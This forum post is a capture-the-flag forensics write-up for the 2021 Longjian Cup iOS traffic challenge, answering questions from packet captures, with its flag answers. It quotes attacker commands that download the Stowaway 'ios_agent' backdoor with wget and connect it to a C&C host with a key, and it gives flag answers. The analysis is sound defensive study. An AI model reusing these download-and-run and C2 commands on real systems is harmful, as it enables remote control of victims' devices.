ToB企服应用市场:ToB评测及商务社交产业平台

标题: [陇剑杯 2021]ios流量分析 [打印本页]
作者: 铁佛    时间: 2024-12-19 13:41
标题: [陇剑杯 2021]ios流量分析
[陇剑杯 2021]ios(问1)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:黑客所控制的C&C服务器IP是********_。得到的flag请使用NSSCTF{}格式提交。
首先过滤http的流量,这边依次点击,进行排查黑客上传了那些文件

背面发现上传了一个ios_agent后门文件

并发现上传的服务器IP
NSSCTF{3.128.156.159}
[陇剑杯 2021]ios(问2)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:黑客利用的Github开源项目标名字是**__**。(如有字母请全部使用小写)。得到的flag请使用NSSCTF{}格式提交。

这段下令是用于从 GitHub 下载一个名为 <font style="color:rgb(122, 122, 122);">ios_agent</font> 的文件并赋予它可执行权限。
wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent && chmod 755 ios_agent
主站+用户名+项目名称+项目资源
所以flag就是
NSSCTF{stowaway}
[陇剑杯 2021]ios(问3)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:通讯加密密钥的明文是********。得到的flag请使用NSSCTF{}格式提交。

./ios_agent -c 3.128.156.159:8081 -s hack4sec
分析:
运行ios_agent这个步伐在3.128.156.159:8081这个端口下-s hack4sec 就是密钥明文
NSSCTF{hack4sec}
[陇剑杯 2021]ios(问4)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:黑客通过SQL盲注拿到了一个敏感数据,内容是********。得到的flag请使用NSSCTF{}格式提交。
由于有些流量的信息是加密的所以要进行解密,这边下载有一个keylog的文件,猜测是TLS解密
给它导入进行解密
打开首先项,再打开Protocols进行TLS解密,应用就行了


筛选http2这个协议,并搜索关键词select

再导出为CVS格式

再写一个提取脚本
  1. import csv
  2. import urllib.parse
  4. # 打开CSV文件
  5. with open('CTF解密脚本/111.csv', newline='', encoding='utf-8') as csvfile:
  6.     reader = csv.reader(csvfile)
  7.     # 打开22.txt文件用于写入
  8.     with open('22.txt', 'w', encoding='utf-8') as txtfile:
  9.         for row in reader:
  10.             # 查找包含SQL盲注的语句
  11.             for item in row:
  12.                 if 'select_hex' in item:
  13.                     # URL解码
  14.                     decoded_sql = urllib.parse.unquote(item)
  15.                     
  16.                     # 写入到22.txt文件
  17.                     txtfile.write(decoded_sql + '\n')
复制代码
再进提取乐成的注入的值
  1. import re
  3. # 读取数据
  4. with open('22.txt', 'r') as file:
  5.     lines = file.readlines()
  7. output_str = ''  # 存储最终字符串
  9. # 遍历数据
  10. for i in range(1, len(lines)):  # 从第二行开始
  11.     current_line = lines[i]
  12.     previous_line = lines[i-1]
  14.     # 过滤数据
  15.     if re.search(r'from_user\)="2B', current_line):
  16.         # 使用正则表达式提取内容
  17.         match = re.search(r'from_user\)="(.*)"', previous_line)
  18.         if match:
  19.             output_str += match.group(1) + ' '
  21. # 输出结果
  22. print(output_str)
复制代码

去掉背面的zzz就是答案

NSSCTF{746558f3-c841-456b-85d7-d6c0f2edabb2}
[陇剑杯 2021]ios(问5)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:黑客端口扫描的扫描器的扫描范围是********。(格式使用“开始端口-结束端口”,例如1-65535)。得到的flag请使用NSSCTF{}格式提交。
一般扫描是TCP进行筛选一下,再点击专家书息筛选RST
_高亮选中的一行体现了一个 TCP 毗连的创建过程中的告诫信息 “Connection reset (RST)”。_这个 RST (Reset) 标志位通常表现 TCP 毗连被非常停止或重置。在正常的 TCP 毗连关闭过程中,双方会发送带有 FIN 标志的数据包来优雅地关闭毗连。而 RST 标志则用于非正常或不测的毗连停止



NSSCTF{10-499}
[陇剑杯 2021]ios(问6)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:被害者手机上被拿走了的私钥文件内容是********。得到的flag请使用NSSCTF{}格式提交。
有问题
[陇剑杯 2021]ios(问7)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币多少,请你通过流量和日志分析后作答:黑客访问/攻击了内网的几个服务器,IP地点为********。(多个IP之间按从小到大排序,使用#来分隔,例如127.0.0.1#192.168.0.1)。得到的flag请使用NSSCTF{}格式提交。

更具日志文件分析,还有流量的端点统计,再已知内网 192 |172 进行筛选
这个最大,说明是攻击者的
根据前面的盲注,被攻击的ip是192.168.1.12

日志文件:

NSSCTF{172.28.0.2#192.168.1.12}
总结

有点难,但问题不大

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4